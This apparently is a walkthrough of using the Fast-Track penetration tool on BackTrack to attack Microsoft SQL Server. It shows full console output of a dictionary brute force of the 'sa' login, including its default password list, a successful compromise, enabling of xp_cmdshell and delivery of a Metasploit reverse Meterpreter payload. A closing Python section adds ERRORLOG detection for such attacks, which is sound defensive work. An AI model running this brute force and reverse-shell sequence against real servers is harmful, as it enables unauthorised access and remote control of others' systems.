On BT5R3, the file /pentest/exploits/fasttrack/config/fasttrack_config needs to be edited to read:
METASPLOIT_PATH=/opt/metasploit/app/
Then start fasttrack and work through the menus:
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

*****************************************************************
**                                                             **
**  Fast-Track - A new beginning...                            **
**  Version: 4.0.2                                             **
**  Written by: David Kennedy (ReL1K)                          **
**  Lead Developer: Joey Furr (j0fer)                          **
**  http://www.secmaniac.com                                   **
**                                                             **
*****************************************************************

Fast-Track Main Menu:

1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track

Enter the number: 4

*****************************************************************
**                                                             **
**  Fast-Track - A new beginning...                            **
**  Version: 4.0.2                                             **
**  Written by: David Kennedy (ReL1K)                          **
**  Lead Developer: Joey Furr (j0fer)                          **
**  http://www.secmaniac.com                                   **
**                                                             **
*****************************************************************

Microsoft SQL Attack Tools

1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage

(q)uit

Enter your choice : 2

*****************************************************************
**                                                             **
**  Fast-Track - A new beginning...                            **
**  Version: 4.0.2                                             **
**  Written by: David Kennedy (ReL1K)                          **
**  Lead Developer: Joey Furr (j0fer)                          **
**  http://www.secmaniac.com                                   **
**                                                             **
*****************************************************************

Enter the IP Address and Port Number to Attack.

Options: (a)ttempt SQL Ping and Auto Quick Brute Force
         (m)ass scan and dictionary brute
         (s)ingle Target (Attack a Single Target with big dictionary)
         (f)ind SQL Ports (SQL Ping)
         (i) want a command prompt and know which system is vulnerable
         (v)ulnerable system, I want to add a local admin on the box...
         (r)aw SQL commands to the SQL Server
         (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
         (h)ost list file of IP addresses you want to attack
         (q)uit

Enter Option: a
Enter username for SQL database (example:sa): sa
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 192.168.1.1/24

Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.

Do you want to perform advanced identification, yes or no: yes
[-] Launching SQL Ping, this may take a while to footprint.... [-]
[*] Please wait while we load the module tree...

Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433
Brute forcing password of on IP 192.168.1.142:1433
Brute forcing password of password on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of password1 on IP 192.168.1.142:1433
Brute forcing password of password123 on IP 192.168.1.142:1433
Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

Sorry the brute force attack was unsuccessful. Better luck next time!
Then continue with SQL Ping:
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433
Brute forcing password of on IP 192.168.1.142:1433
Brute forcing password of password on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of password1 on IP 192.168.1.142:1433
Brute forcing password of password123 on IP 192.168.1.142:1433

SQL Server Compromised: "sa" with password of: "password123" on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 192.168.1.142:1433 *** U/N: sa P/W: password123 ***

*******************************************

To interact with system, enter the SQL Server number.

Example: 1. 192.168.1.32 you would type 1

Enter the number: 1

Specify payload:

1. Standard Command Prompt
2. Metasploit Reverse VNC TCP (Requires Metasploit)
3. Metasploit Meterpreter (Requires Metasploit)
4. Metasploit Reflective VNC DLL Injection (Requires Metasploit)

Enter number here: 3

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

What port do you want the payload to connect to you on: 4444

Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: 6200
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...

When finished, close the metasploit handler window to return to other compromised SQL Servers.
Press enter to return back to compromised SQL Servers.
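
Seen from the SQL Server side, the run above leaves a recognizable trail in the server's ERRORLOG: a burst of failed sa logins from one client, a successful login, then xp_cmdshell being switched on. The detection logic below is an added example, not part of the original post or of Fast-Track; the log lines are constructed, the client addresses and thresholds are assumptions, and it assumes login auditing is set to record both failed and successful logins.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# ERRORLOG login audit entries and the sp_configure notice for xp_cmdshell.
LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]")
XP_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def analyze(lines, threshold=5, window=timedelta(seconds=60)):
    """Return findings as (kind, client, user) tuples, in log order."""
    failures = defaultdict(list)      # (client, user) -> failure timestamps
    alerted, findings = set(), []
    for line in lines:
        if XP_ON.search(line):
            findings.append(("xp_cmdshell_enabled", None, None))
            continue
        m = LOGIN.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        key = (m["client"], m["user"])
        if m["result"] == "failed":
            failures[key].append(ts)
        # Failures by this client/login pair inside the sliding window.
        recent = [t for t in failures[key] if ts - t <= window]
        if len(recent) < threshold:
            continue
        if m["result"] == "succeeded":
            findings.append(("success_after_bruteforce", *key))
        elif key not in alerted:      # report each guessing burst once
            alerted.add(key)
            findings.append(("bruteforce", *key))
    return findings

def sample_log():
    # Constructed sample shaped like SQL Server ERRORLOG entries.
    fail = ("2013-01-01 10:00:{:02d}.00 Logon       Login failed for user 'sa'. Reason: "
            "Password did not match that for the login provided. [CLIENT: 192.0.2.10]")
    return [fail.format(s) for s in range(7)] + [
        "2013-01-01 10:00:07.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]",
        "2013-01-01 10:00:09.00 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
        "2013-01-01 10:05:00.00 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.20]",
        "2013-01-01 10:05:05.00 Logon       Login succeeded for user 'app'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.20]",
    ]

if __name__ == "__main__":
    for finding in analyze(sample_log()):
        print(finding)
```

A single mistyped password followed by a good login, as in the last two sample lines, stays below the threshold and is not reported.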